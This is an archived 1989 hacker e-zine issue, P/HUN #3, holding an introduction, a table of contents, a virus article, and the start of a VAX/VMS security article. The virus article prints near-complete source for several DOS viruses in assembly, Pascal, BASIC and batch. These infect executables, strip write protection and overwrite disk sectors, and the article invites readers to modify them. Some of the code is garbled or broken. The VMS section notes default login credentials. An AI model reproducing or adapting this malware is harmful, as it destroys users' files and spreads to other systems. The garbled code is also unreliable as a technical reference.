home *** CD-ROM | disk | FTP | other *** search
/ 20 Miles North of Nowhere BBS / 20miles_north_of_nowhere_1996_05_10.zip / 20miles_north_of_nowhere_1996_05_10 / HPTEXT / PHUN / PHUN-3.ZIP / PHUN-3
Text File  |  1993-02-11  |  242KB  |  5,705 lines

  1.  
  2. ()---------------------------------------------------------------------------()
  3.  
  4.                           * = % = % = % = % = % = *
  5.                       ----=                       =----
  6.                    -------%     P H U N   ]I[     %-------
  7.                       ----=                       =----
  8.                           * = % = % = % = % = % = *
  9.  
  10.  
  11.   P/HUN Issue #3, Volume 2                      Articles [10] + Introduction
  12.   Release : February 11th 1989                  Comments: New - Vol 2
  13.  
  14.  
  15.                            ==P/HUN Magazine Inc.==
  16.  
  17.                    @ The Hacker's Den Bulletin Board System
  18.           [ Home of P/HUN Online Magazine  &  2600 Magazine BBS #5 ]
  19.                   (718)358/9209 :: 300/1200 Baud :: Open 24 Hrs
  20.  
  21.                                Proudly presents...
  22.  
  23.                                P/HUN Issue III
  24.                                ---------------
  25.                    P/HUN Issue 3, Volume 2: Phile 1 of 11
  26.  
  27.  
  28.                              Introduction & Index
  29.                              --------------------
  30.  
  31.  Welcome to P/HUN (fun) Issue III. A new volume for the New Year. We still
  32.  remember some people often ridiculed and thought that P/HUN Newsletter would
  33.  stop producing after the first or the second issue. Looks like that fraction
  34.  underestimated us severly.
  35.  
  36.  I would also like to say this, P/HUN was started with one highly noble
  37.  thought in mind i.e. to spread knowledge that we individually or collectively
  38.  acquire through various resources. The intent has and will never be to
  39.  degrade other highly esteemed newsletters or compete with them in anyway.
  40.  The idea is to co-exist symbiotically for the good of the readers, in mutual
  41.  respect and assistance of each other.
  42.  
  43.  We at P/HUN Inc. are very pleased that people enjoyed our last issue.
  44.  We received many calls from all over the U.S commenting about Mr. Slippery's
  45.  "Guide to PICK Operating System" and The Mentor's "Beginners Hacking Guide".
  46.  We at P/HUN Inc. would like to thank both of them for their great
  47.  contributions and hope hear more from them in future.
  48.  
  49.  We are still looking for someone experienced enough to write various news and
  50.  happenings that occur in the Phreak/Hack community. I thank all that applied,
  51.  but we really didn't find anyone properly qualified.
  52.  
  53.  A lot of hard work and effort has gone into making this issue possible. Yes
  54.  the size of this issue is record breaking. We hope you find it intresting.
  55.  
  56.  If you have any comments, suggestion or would like to submit to our ever
  57.  growing newsletter, contact us at The Hacker's Den. If we find your article
  58.  intresting we will gladly publish it. Remember to only send us "original" &
  59.  "unreleased" stuff. There will be no exceptions. Although this issue contains
  60.  an article by Capt. Zap which has already been released. This file was a major
  61.  exeception due to the fact that we found it very intresting.
  62.  
  63.  P/HUN Issues can be obtained from one of the sponsor boards listed below:
  64.  
  65.  The Phoenix Project - 512-441/3088 [Official Phrack & LOD/H TJ! release point]
  66.  The Central Office - 914-234/3260 [2600 Bulletin Board System #2]
  67.  
  68.  Here it is P/HUN Online Magazine Issue #3...Enjoy!
  69.  
  70.                                                     Red Knight & DareDevil
  71.                                                   SysOps of The Hacker's Den
  72.                                               @ P/HUN Magazine Inc. / TSAN 89!
  73.  
  74. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  75.  
  76.    *-------------------*
  77.  -=| Table of Contents |=-
  78.    *-------------------*
  79.  
  80. No.    Phile Description                             Author            Size
  81. ---    ----------------------------------------      ------            ----
  82. #1 -   Introduction & Table of Contents              Red Knight        3K
  83. #2  -  Viruses: Assembly, Pascal, Basic & Batch      Tesla Coil ][     24K
  84. #3  -  VAX/VMS System Security                       Lawrence Xavier   18K
  85. #4  -  AUtomated VOice Network(AUTOVON): An Outline  DareDevil         26K
  86. #5  -  The Pan Am Airline Computer Part "A"          Red Knight        47K
  87. #6  -  The Pan Am Airline Computer Part "B"          Red Knight        26K
  88. #7  -  Common Channel (I) Signalling:An overview     Tubular Phreak    18K
  89. #8  -  Who's Listening *                             Capt. Zap         58K
  90. #9  -  An Introduction to BITNET                     Aristotle         10K
  91. #10 -  Plastic Card Encoding Practices & Standards   Hasan Ali         6K
  92. #11 -  Lockpicking: An Indepth Guide                 The LockSmith     14K
  93.  
  94. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  95. =                 P/HUN Issue #3, Volume 2: Phile #2 of 11                    =
  96. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  97.  
  98.                  Viruses: Assembly, Pascal, Basic & Batch
  99.                  ----------------------------------------
  100.                           By  Tesla Coil ][
  101.  
  102.  
  103. [ I do not take any responsibility for any damages that may occur when  ]
  104. [ compiling viruses in this article. This article has been written to   ]
  105. [ promote knowledge into the amazing world of computer viruses.         ]
  106.  
  107. Viruses can be written in practically every computer language known today.
  108. Although most effective viruses have been written in Assembly.
  109.  
  110. Many of us think that viruses cannot be written in Basic due to its limited
  111. ability. This is untrue. Basic has the capability of producing very effective
  112. viruses if properly used. Combining assembly and basic could futher enhance
  113. the effectiveness of the virus.
  114.  
  115. In this article we will examine some viruses written in Assembly, Pascal, Basic
  116. and Batch written by B. Fix, R. Burger and M. Vallen which proved to be very
  117. intresting to me.
  118.  
  119. Please use some caution handling these virus programs. Please use a separate
  120. disks when you wish to compile.
  121.  
  122.                         Virus in Assembly Language
  123.                         --------------------------
  124.  
  125. Most viruses out there have been written in assembly because assembly has the
  126. unique ability to bypass operating system security.
  127. Here is an example of a virus written under MS-DOS 2.1 and can obviously be
  128. compiled in the later versions. The article contains remarks so as to further
  129. explain the parts. Programmers may wish to delete those segments if desired.
  130.  
  131. ***************************************************
  132. ;   Program Virus
  133. ;   Version 1.1
  134. ;   Writter : R. Burger
  135. ;   Created 1986
  136. ;   This is a demonstration program for computer
  137. ;   viruses. It has the ability to replace itself.
  138. ;   and thereby modify other programs. Enjoy.
  139. ;**************************************************
  140.  
  141. Code   Segment
  142.        Assume  CS:Code
  143. progr  equ 100h
  144.        ORG progr
  145.  
  146. ;**************************************************
  147. ;   The three NOP's serve as the marker byte of the
  148. ;   virus which allow it to identify a virus.
  149. ;**************************************************
  150.  
  151. MAIN:
  152.        nop
  153.        nop
  154.        nop
  155.  
  156. ;**************************************************
  157. ;   Initialize the pointers
  158. ;**************************************************
  159.  
  160.        mov ax,00
  161.        mov es:[pointer],ax
  162.        mov es:[counter],ax
  163.        mov es:[disks],al
  164.  
  165. ;**************************************************
  166. ;   Get the selected drive
  167. ;**************************************************
  168.  
  169.        mov ah,19h             ;drive?
  170.        int 21h
  171.  
  172. ;**************************************************
  173. ;   Get the current path on the current drive
  174. ;**************************************************
  175.  
  176.        mov cs:drive,al        ;save drive
  177.        mov ah,47h             ;dir?
  178.        mov dh,0
  179.        add al,1
  180.        mov dl,al              ;in actual drive
  181.        lea si,cs:old_path     ;
  182.        int 21h
  183.  
  184. ;**************************************************
  185. ;   Get the number of drives present. If only one
  186. ;   is present, the pointer for the search order
  187. ;   will be set to serach order + 6
  188. ;**************************************************
  189.  
  190.        mov as,0eh             ;how many disks
  191.        mov dl,0               ;
  192.        int 21h
  193.  
  194.        mov al,01
  195.        cmp al,01              ;one drive
  196.        jnz hups3
  197.        mov al,06
  198.  
  199. hups3: mov ah,0
  200.        lea bx,search_order
  201.        add bx,ax
  202.        add bx,0001h
  203.        mov cs:pointer,bx
  204.        clc
  205.  
  206. ;**************************************************
  207. ;   Carry is set, if no more .COM's are found.
  208. ;   Then, to avoid unnecessary work, .EXE files will
  209. ;   be renamed to .COM files and infected.
  210. ;   This causes the error message "Program to large
  211. ;   to fit memory" when starting larger infected
  212. ;   EXE programs.
  213. ;*************************************************
  214.  
  215. change_disk:
  216.       jnc no_name_change
  217.       mov ah,17h              ;change .EXE to .COM
  218.       lea dx,cs:maske_exe
  219.       int 21h
  220.       cmp al,0ffh
  221.       jnz no_name_change      ;.EXE found?
  222.  
  223. ;****************************************************
  224. ;   If neither  .COM nor .EXE is found then sectors
  225. ;   will be overwritten depending on the system time
  226. ;   in milliseconds. This is the time of the complete
  227. ;   "infection" of a storage medium. The virus can
  228. ;   find nothing more to infect and starts its destruction
  229. ;*****************************************************
  230.  
  231.       mov ah,2ch              ; read system clock
  232.       int 21h
  233.       mov bx,cs:pointer
  234.       mov al,cs:[bx]
  235.       mov bx,dx
  236.       mov cx,2
  237.       mov dh,0
  238.       int 26h                 ; write crap on disk
  239.  
  240. ;******************************************************
  241. ;   Check if the end of the search order table has been
  242. ;   reached . If so, end.
  243. ;******************************************************
  244.  
  245. no_name_change:
  246.       mov bx,cs:pointer
  247.       dec bx
  248.       mov cs:pointer,bx
  249.       mov dl,cs:[bx]
  250.       cmp dl,0ffh
  251.       jnz hups2
  252.       jmp hops
  253.  
  254. ;****************************************************
  255. ;   Get new drive from the search order table and
  256. ;   select it .
  257. ;***************************************************
  258.  
  259. hups2:
  260.       mov ah,0eh
  261.       int 21h                    ;change disk
  262.  
  263. ;***************************************************
  264. ;   Start in the root directory
  265. ;***************************************************
  266.  
  267.       mov ah,3bh                 ;change path
  268.       lea dx,path
  269.       int 21h
  270.       jmp find_first_file
  271.  
  272. ;**************************************************
  273. ;   Starting from the root, search for the first
  274. ;   subdir. FIrst convert all .EXE files to .COM
  275. ;   in the old directory
  276. ;**************************************************
  277.  
  278. find_first_subdir:
  279.       mov ah,17h                 ;change .exe to .com
  280.       lea dx,cs:maske_exe
  281.       int 21h
  282.       mov ah,3bh                 ;use root directory
  283.       lea dx,path
  284.       int 21h
  285.       mov ah,04eh                ;search for first subdirectory
  286.       mov cx,00010001b           ;dir mask
  287.       lea dx,maske_dir           ;
  288.       int 21h                    ;
  289.       jc change_disk
  290.       mov bx,CS:counter
  291.       INC,BX
  292.       DEC bx
  293.       jz  use_next_subdir
  294.  
  295. ;*************************************************
  296. ;   Search for the next subdirectory. If no more
  297. ;   directories are found, the drive will be changed.
  298. ;*************************************************
  299.  
  300. find_next_subdir:
  301.       mov ah,4fh               ; search for next subdir
  302.       int 21h
  303.       jc change_disk
  304.       dec bx
  305.       jnz find_next_subdir
  306.  
  307. ;*************************************************
  308. ;   Select found directory.
  309. **************************************************
  310.  
  311. use_next_subdir:
  312.       mov ah,2fh               ;get dta address
  313.       int 21h
  314.       add bx,1ch
  315.       mov es:[bx],'X          ;address of name in dta
  316.       inc bx
  317.       push ds
  318.       mov ax,es
  319.       mov ds,ax
  320.       mov dx,bx
  321.       mov ah,3bh               ;change path
  322.       int 21h
  323.       pop ds
  324.       mov bx,cs:counter
  325.       inc bx
  326.       mov CS:counter,bx
  327.  
  328. ;**************************************************
  329. ;    Find first .COM file in the current directory.
  330. ;    If there are none, search the next directory.
  331. ;**************************************************
  332.  
  333. find_first_file:
  334.       mov ah,04eh              ;Search for first
  335.       mov cx,00000001b         ;mask
  336.       lea dx,maske_com         ;
  337.       int 21h                  ;
  338.       jc find_first_subdir
  339.       jmp check_if_ill
  340.  
  341. ;**************************************************
  342. ;   If program is ill(infected) then search for
  343. ;   another other.
  344. ;**************************************************
  345.  
  346. find_next_file:
  347.       mov ah,4fh               ;search for next
  348.       int 21h
  349.       jc find_first_subdir
  350.  
  351. ;*************************************************
  352. ;   Check is already infected by virus.
  353. **************************************************
  354.  
  355. check_if_ill:
  356.       mov ah,3dh              ;open channel
  357.       mov al,02h              ;read/write
  358.       mov dx,9eh              ;address of name in dta
  359.       int 21
  360.       mov bx,ax               ;save channel
  361.       mov ah,3fh              ; read file
  362.       mov ch,buflen           ;
  363.       mov dx,buffer           ;write in buffer
  364.       int 21h
  365.       mov ah,3eh              ;close file
  366.       int 21h
  367.  
  368. ;***************************************************
  369. ;   This routine will search the three NOP's(no
  370. ;   operation).If present there is already an infection.
  371. ;   We must then continue the search
  372. ;****************************************************
  373.  
  374.      mov bx,cs:[buffer]
  375.      cmp bx,9090h
  376.      jz find_next_file
  377.  
  378. ;***************************************************
  379. ;   This routine will BY PASS MS-DOS WRITE PROTECTION
  380. ;   if present. Very important !
  381. ;***************************************************
  382.  
  383.      mov ah,43h               ;write enable
  384.      mov al,0
  385.      mov dx,9eh               ;address of name in dta
  386.      int 21h
  387.      mov ah,43h
  388.      mov al,01h
  389.      and cx,11111110b
  390.      int 21h
  391.  
  392. ;****************************************************
  393. ;   Open file for read/write access.
  394. *****************************************************
  395.  
  396.      mov ah,3dh               ;open channel
  397.      mov al,02h               ;read/write
  398.      mov dx,9eh               ;address of name in dta
  399.      int 21h
  400.  
  401. ;****************************************************
  402. ;   Read date entry of program and save for future
  403. ;   use.
  404. ;****************************************************
  405.  
  406.     mov bx,ax                ;channel
  407.     mov ah,57h               ;get date
  408.     mov al.0
  409.     int 21h
  410.     push cx                  ;save date
  411.     push dx
  412.  
  413. ;****************************************************
  414. ;   The jump located at address 0100h of the program
  415. ;   will be saved for further use.
  416. *****************************************************
  417.  
  418.     mov dx,cs:[conta]        ;save old jmp
  419.     mov cs:[jmpbuf],dx
  420.     mov dx,cs:[buffer+1]     ;save new jump
  421.     lea cx,cont-100h
  422.     sub dx,cx
  423.     mov cs:[conta],dx
  424.  
  425. ;*****************************************************
  426. ;   The virus copies itself to the start of the file.
  427. ;*****************************************************
  428.  
  429.     mov ah,57h               ;write date
  430.     mov al,1
  431.     pop dx
  432.     pop cx                   ;restore date
  433.     int 21h
  434.  
  435. ;*****************************************************
  436. ;   Close the file.
  437. ;*****************************************************
  438.  
  439.     mov ah,3eh               ;close file
  440.     int 21h
  441.  
  442. ;*****************************************************
  443. ;   Restore the old jump address. The virus saves at
  444. ;   address "conta" the jump which was at the start of
  445. ;   the host program.
  446. ;   This is done to preserve the executability of the
  447. ;   host program as much as possible.
  448. ;   After saving it still works with the jump address
  449. ;   contained in the virus. The jump address in the
  450. ;   virus differs from the jump address in memory.
  451. ;****************************************************
  452.  
  453.     mov dx,cs:[jmpbuf]       ;restore old jump
  454.     mov cs:[conta],dx
  455. hops:  nop
  456.        call use_old
  457.  
  458. ;****************************************************
  459. ;   Continue with the host program.
  460. ;****************************************************
  461.  
  462. cont    db 0e9h                ;make jump
  463. conta   dw 0
  464.         mov ah,00
  465.         int 21h
  466.  
  467. ;***************************************************
  468. ;   Reactivate the selected drive at the start of
  469. ;   the program.
  470. ;***************************************************
  471.  
  472. use_old:
  473.         mov ah,0eh             ;use old drive
  474.         mov dl,cs:drive
  475.         int 21h
  476.  
  477. ;***************************************************
  478. ;    Reactivate the selected path at the start of
  479. ;    the program.
  480. ;***************************************************
  481.  
  482.         mov ah,3bh             ;use old drive
  483.         lea dx,old_path-1      ;get old path and backslash
  484.         int 21h
  485.         ret
  486.  
  487. search_order db 0ffh,1,0,2,3,0ffh,00,offh
  488. pointer      dw   0000           ;pointer f. search order
  489. counter      dw   0000           ;counter f. nth. search
  490. disks        db    0             ;number of disks
  491.  
  492. maske_com    db "*.com",00       ;search for com files
  493. maske_dir    db "*",00           ;search for dir's
  494. maske_exe    db offh,0,0,0,0,0,00111111b
  495.              db 0,"????????exe",0,0,0,0
  496.              db 0,"????????com",0
  497. maske_all    db offh,0,0,0,0,0,00111111b
  498.              db 0,"???????????",0,0,0,0
  499.              db 0,"????????com",0
  500.  
  501. buffer equ 0e00h                 ;a safe place
  502.  
  503. buflen equ 230h                  ;lenght of virus!!!!
  504.                                  ;carefull
  505.                                  ;if changing!!!!
  506. jmpbuf equ buffer+buflen         ;a safe place for jmp
  507. path  db "X",0                   ;first place
  508. drive db 0                       ;actual drive
  509. back_slash db "X"
  510. old_path db 32 dup (?)           ;old path
  511.  
  512. code ends
  513.  
  514. end main
  515.  
  516. [ END OF THIS VIRUS PROGRAM ]
  517.  
  518.  
  519.  
  520.                              Virus in Pascal
  521.                              ---------------
  522.  
  523.  
  524. Pascal is another high level language that can produce eye popping computer
  525. viruses. Especially when the usage of Turbo Pascal is involved.
  526. The virus below was available through various bulletin boards for
  527. a while.
  528.  
  529. $
  530. ------------------------------------------------------------------
  531. Number One
  532.  
  533.  
  534. Please handle this virus with care!!!!!!!!!!! [Deadly Demo]
  535.  
  536. Number One infects all .COM - file's name will be displayed
  537. That file has been overwritten with Number Ones's program code and
  538. is not reconstructible! If all files are infected or or no .COM
  539. files are found, Number one gives you a <Smile>.
  540. Files may be protected against infections of Number One by
  541. setting the Read ONLY attribute.
  542.  
  543. Written 10.3.87 by M.Vallen (Turbo Pascal 3.01A)
  544.  
  545. ------------------------------------------------------ 
  546. 
  547.  
  548. $C-
  549. $U-
  550. $I-       $ Wont allow a user break, enable IO check
  551.  
  552. $ -- Constants --------------------------------------- 
  553.  
  554. Const
  555.      VirusSize = 12027;    $Number One's code size
  556.  
  557.      Warning   :String[42]    $Warning message
  558.      = 'This file has been infected ny Number One!';
  559.  
  560. $ -- Type declarations------------------------------------- 
  561.  
  562. Type
  563.      DTARec    =Record      $Data area for file search 
  564.      DOSnext  :Array[1..21] of Byte;
  565.                    Attr    : Byte;
  566.                    Ftime,
  567.                    FDate,
  568.                    FLsize,
  569.                    FHsize  : Integer;
  570.                    FullName: Array[1..13] of Char;
  571.                  End;
  572.  
  573. Registers    = Record    $Register set used for file search 
  574.    Case Byte of
  575.    1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
  576.    2 : (AL,AH,BL,BH,CL,CH,DL,DH          : Byte);
  577.    End;
  578.  
  579. $ -- Variables--------------------------------------------- 
  580.  
  581. Var
  582.                                $ Memory offset program code 
  583.    ProgramStart : Byte absolute Cseg:$100;
  584.                                           $ Infected marker 
  585.    MarkInfected : String[42] absolute Cseg:$180;
  586.    Reg          : Registers;                 $ Register set 
  587.    DTA          : DTARec;                       $ Data area 
  588.    Buffer       : Array[Byte] of Byte;        $ Data buffer 
  589.    TestID       : String[42]; $ To recognize infected files 
  590.    UsePath      : String[66];        $ Path to search files 
  591.                                     $ Lenght of search path 
  592.    UsePathLenght: Byte absolute UsePath;
  593.    Go           : File;                    $ File to infect 
  594.    B            : Byte;                              $ Used 
  595.  
  596. $ -- Program code------------------------------------------ 
  597.  
  598. Begin
  599.   WriteLn(Warning);               $ Display warning message 
  600.   GetDir(0, UsePath);               $ get current directory 
  601.   if Pos('X', UsePath) <> UsePathLenght then
  602.     UsePath := UsePath + 'X';
  603.   UsePath := UsePath + '*.COM';        $ Define search mask 
  604.   Reg.AH := $1A;                            $ Set data area 
  605.   Reg.DS := Seg(DTA);
  606.   Reg.DX := Ofs(DTA);
  607.   MsDos(Reg);
  608.   UsePath[Succ(UsePathLenght)]:=#0; $ Path must end with #0 
  609.   Reg.AH := $4E;
  610.   Reg.DS := Seg(UsePath);
  611.   Reg.DX := Ofs(UsePath[1]);
  612.   Reg CX := $ff;          $ Set attribute to find ALL files 
  613.   MsDos(Reg);                   $ Find first matching entry 
  614.   IF not Odd(Reg.Flags) Then         $ If a file found then 
  615.     Repeat
  616.       UsePath := DTA.FullName;
  617.       B := Pos(#0, UsePath);
  618.       If B > 0 then
  619.       Delete(UsePath, B, 255);             $ Remove garbage 
  620.       Assign(Go, UsePath);
  621.       Reset(Go);
  622.       If IOresult = 0 Then          $ If not IO error then 
  623.       Begin
  624.         BlockRead(Go, Buffer, 2);
  625.         Move(Buffer[$80], TestID, 43);
  626.                       $ Test if file already ill(Infected) 
  627.         If TestID <> Warning Then        $ If not then ... 
  628.         Begin
  629.           Seek (Go, 0);
  630.                             $ Mark file as infected and .. 
  631.           MarkInfected := Warning;
  632.                                                $ Infect it 
  633.           BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7);
  634.           Halt;                   $.. and halt the program 
  635.         End;
  636.         Close(Go);
  637.       End;
  638.         $ The file has already been infected, search next. 
  639.       Reg.AH := $4F;
  640.       Reg.DS := Seg(DTA);
  641.       Reg.DX := Ofs(DTA);
  642.       MsDos(Reg);
  643.     $  ......................Until no more files are found 
  644.     Until Odd(Red.Flags);
  645.   Write(<Smile>');                          $Give a smile 
  646. End.
  647.  
  648.  
  649. Although this is a primitive virus its effective.In this virus only the .COM
  650. files are infected. Its about 12K and it will change the date entry.
  651.  
  652.  
  653.  
  654.                            Viruses in Basic
  655.                            ----------------
  656.  
  657.  
  658. Basic is great language and often people think of it as a limited language
  659. and will not be of any use in creating something like a virus. Well you are
  660. really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987.
  661. This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE
  662. files.To do this you must compile the source code using a the Microsoft
  663. Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit
  664. the source code to place the lenght of the object program in the LENGHTVIR
  665. variable. BV3.EXE should be in the current directory, COMMAND.COM must be
  666. available, the LENGHTVIR variable must be set to the lenght of the linked
  667. program and remember to use /e parameter when compiling.
  668.  
  669. 10 REM ** DEMO
  670. 20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
  671. 30 REM ** BASIC DOESNT SUCK
  672. 40 REM ** NO KIDDING
  673. 50 ON ERROR GOTO 670
  674. 60 REM *** LENGHTVIR MUST BE SET **
  675. 70 REM *** TO THE LENGHT TO THE **
  676. 80 REM *** LINKED PROGRAM ***
  677. 90 LENGHTVIR=2641
  678. 100 VIRROOT$="BV3.EXE"
  679. 110 REM *** WRITE THE DIRECTORY IN THE FILE "INH"
  680. 130 SHELL "DIR *.EXE>INH"
  681. 140 REM ** OPEN "INH" FILE AND READ NAMES **
  682. 150 OPEN "R",1,"INH",32000
  683. 160 GET #1,1
  684. 170 LINE INPUT#1,ORIGINAL$
  685. 180 LINE INPUT#1,ORIGINAL$
  686. 190 LINE INPUT#1,ORIGINAL$
  687. 200 LINE INPUT#1,ORIGINAL$
  688. 210 ON ERROR GOT 670
  689. 220 CLOSE#2
  690. 230 F=1:LINE INPUT#1,ORIGINAL$
  691. 240 REM ** "%" IS THE MARKER OF THE BV3
  692. 250 REM ** "%" IN THE NAME MEANS
  693. 260 REM  ** INFECTED COPY PRESENT
  694. 270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210
  695. 280 ORIGINAL$=MID$(ORIGINAL$,1,13)
  696. 290 EXTENSIONS$=MID$(ORIGINAL,9,13)
  697. 300 MID$(EXTENSIONS$,1,1)="."
  698. 310 REM *** CONCATENATE NAMES INTO FILENAMES **
  699. 320 F=F+1
  700. 330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN
  701. GOTO 350
  702. 340 GOTO 320
  703. 350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
  704. 360 ON ERROR GOTO 210
  705. 365 TEST$=""
  706. 370 REM ++ OPEN FILE FOUND +++
  707. 380 OPEN "R",2,OROGINAL$,LENGHTVIR
  708. 390 IF LOF(2) < LENGHTVIR THEN GOTO 420
  709. 400 GET #2,2
  710. 410 LINE INPUT#1,TEST$
  711. 420 CLOSE#2
  712. 431 REM ++ CHECK IF PROGRAM IS ILL ++
  713. 440 REM ++ "%" AT THE END OF THE FILE MEANS..
  714. 450 REM ++ FILE IS ALREADY SICK ++
  715. 460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210
  716. 470 CLOSE#1
  717. 480 ORIGINALS$=ORIGINAL$
  718. 490 MID$(ORIGINALS$,1,1)="%"
  719. 499 REM ++++ SANE "HEALTHY" PROGRAM ++++
  720. 510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$
  721. 520 SHELL C$
  722. 530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
  723. 540 C$="COPY "+VIRROOT$+ORIGINAL$
  724. 550 SHELL C$
  725. 560 REM *** APPEND VIRUS MARKER ***
  726. 570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
  727. 580 WRITE#1,ORIGINALS$
  728. 590 CLOSE#1
  729. 630 REM ++ OUYPUT MESSAGE ++
  730. 640 PRINT "INFECTION IN " ;ORIGIANAL$; "  !! BE WARE !!"
  731. 650 SYSTEM
  732. 660 REM ** VIRUS ERROR MESSAGE
  733. 670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
  734. 680 END
  735.  
  736.  
  737. This basic virus will only attack .EXE files. After the execution you will
  738. see a "INH" file which contains the directory, and the file %SORT.EXE.
  739. Programs which start with "%" are NOT infected ,they pose as back up copies.
  740.  
  741.  
  742.                             Batch Viruses
  743.                             -------------
  744.  
  745.  
  746. Whoever thought that viruses could be in BATCH file.This virus which we
  747. are about to see makes use of MS-DOS operating system. This BATCH virus
  748. uses DEBUG & EDLIN programs.
  749.  
  750. Name: VR.BAT
  751.  
  752. echo = off         ( Self explanatory)
  753. ctty nul           ( This is important. Console output is turned off)
  754. path c:Xmsdos      ( May differ on other systems )
  755. dir *.com/w>ind    ( The directory is written on "ind" ONLY name entries)
  756. edlin ind<1        ( "Ind" is processed with EDLIN so only file names appear)
  757. debug ind<2        ( New batch program is created with debug)
  758. edlin name.bat<3   ( This batch goes to an executable form because of EDLIN)
  759. ctty con           ( Console interface is again assigned)
  760. name               ( Newly created NAME.BAT is called.
  761.  
  762.  
  763. In addition to file to this Batch file,there command files,here named 1,2,3
  764.  
  765. Here is the first command file:
  766. -------------------------------
  767. Name: 1
  768.  
  769. 1,4d               ( Here line 1-4 of the "IND" file are deleted )
  770. e                  ( Save file )
  771.  
  772. Here is the second command file:
  773. --------------------------------
  774. Name: 2
  775.  
  776. m100,10b,f000      (First program name is moved to the F000H address to save)
  777. e108 ".BAT"        (Extention of file name is changed to .BAT)
  778. m100,10b,f010      (File is saved again)
  779. e100"DEL "         (DEL command is written to address 100H)
  780. mf000,f00b,104     (Original file is written after this command)
  781. e10c 2e            (Period is placed in from of extension)
  782. e110 0d,0a         (Carrige return+ line feed)
  783. mf010,f020,11f     ( Modified file is moved to 11FH address from buffer area)
  784. e112 "COPY XVR.BAT" ( COPY command is now placed in front of file)
  785. e12b od,0a         (COPY command terminated with carriage return + lf)
  786. rxc                ( The CX register is ... )
  787. 2c                 ( set to 2CH)
  788. nname.bat          ( Name it NAME.BAT)
  789. w                  ( Write )
  790. q                  ( quit )
  791.  
  792.  
  793. The third command file must be printed as a hex dump because it contains
  794. 2 control characters (1Ah=Control Z) and this is not entirely printable.
  795.  
  796. Hex dump of the third command file:
  797. -----------------------------------
  798. Name: 3
  799.  
  800. 0100   31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
  801.        1  ,  1  ?        .  .  n  y  y  y  y  y  y  y
  802. 0110   79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
  803.        y     .  2  ,  ?  ?  r     .  .  n  n  y  y  y
  804. 0120   79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
  805.        y  y  y  y     .  E  .  .  .  .  .  .  .  .  .
  806.  
  807.  
  808. In order for this virus to work VR.BAT should be in the root. This program only
  809. affects .COM files.
  810.  
  811.                               End Note
  812.                               --------
  813. All these viruses can be modified to suit your needs. If anyone has seen any
  814. intresting viruses please contact me at The Hacker's Den BBS.
  815.  
  816. Suggested readings:
  817.  
  818. Computer Viruses: A high Tech Disease by Abacus
  819. 2600 Magazine: Volume 5, Number 2
  820.  
  821. -TC][-
  822.  
  823. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  824. =                 P/HUN Issue #3, Volume 2: Phile #3 of 11                    =
  825. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  826.  
  827.                           VAX/VMS System Security
  828.                           =======================
  829.                 Written for P/HUN Inc.,P/HUN Online Magazine
  830.                 --------------------------------------------
  831.                              By  Lawrence Xavier
  832.                                January, 1989
  833.  
  834.  
  835. VAX/VMS may be the worlds best operating system. It certainly beats the
  836. pants off each and every IBM OS, and wins over Unix hands down. Native
  837. VAX/VMS security is rated higher (by the U.S. Government) than all IBM
  838. mainframe OSs, even after such security packages as RACF and Top Secret
  839. are added to them.
  840.  
  841. VMS is not without its foibles and kludges, however. For one thing,
  842. enabling all the security features of VMS is guaranteed to crash the
  843. system! For another, many of VMS's security features are  annoying to
  844. set up, encouraging lazy system managers to put off doing so indefinitely.
  845.  
  846. VMS got a bad reputation when young hackers were able to routinely break
  847. into many systems by using default accounts and passwords such as username
  848. SYSTEM with password MANAGER. This has all changed with VMS 4.7: in the
  849. upgrade procedure the installer is required to change passwords on these
  850. accounts or eliminate them entirely.
  851.  
  852. Let's go over some of the basic features of VMS security, then look at some
  853. common problems and loopholes. Once you know what the loopholes are you can
  854. take steps to close them on systems you manage and increase security.
  855.  
  856.  
  857. VMS Security Features
  858. =====================
  859.  
  860. Logging In:
  861. -----------
  862. VAX/VMS systems have several types of protection that can be set up on
  863. logins. Logins can be restricted by time of day, day of the week, and by
  864. terminal ID. Logins can also be restricted by where they come from: Local,
  865. Remote, Dialup, etc.
  866.  
  867.      Local    are logins on direct connect ports or DECservers.
  868.      Remote   are logins across DECnet.
  869.      Dialup   are logins across X.25 or on ports set with the DIALUP
  870.               characteristic.
  871.  
  872. Usually VMS will present a
  873.      Username:
  874. prompt after it sees one or two <CR> characters (which are used by VMS to
  875. set the Baud rate, if AutoBaud is enabled).
  876.  
  877. If a System Password has been set on the port, VMS will BEEP after the
  878. first <CR>, and will then seem to be dead. Only after the correct System
  879. Password has been entered will the Username: prompt be given.
  880.  
  881. VMS gives no indication of whether a correct username has been entered: it
  882. always asks for a Password:. VMS passwords can be like any other passwords,
  883. or they may be generated nonsense words. The /GENERATE_PASSWORD qualifier
  884. may be placed on user accounts by the system manager, forcing them to
  885. select from lists of supposedly easy to remember but nonsensical
  886. passwords.
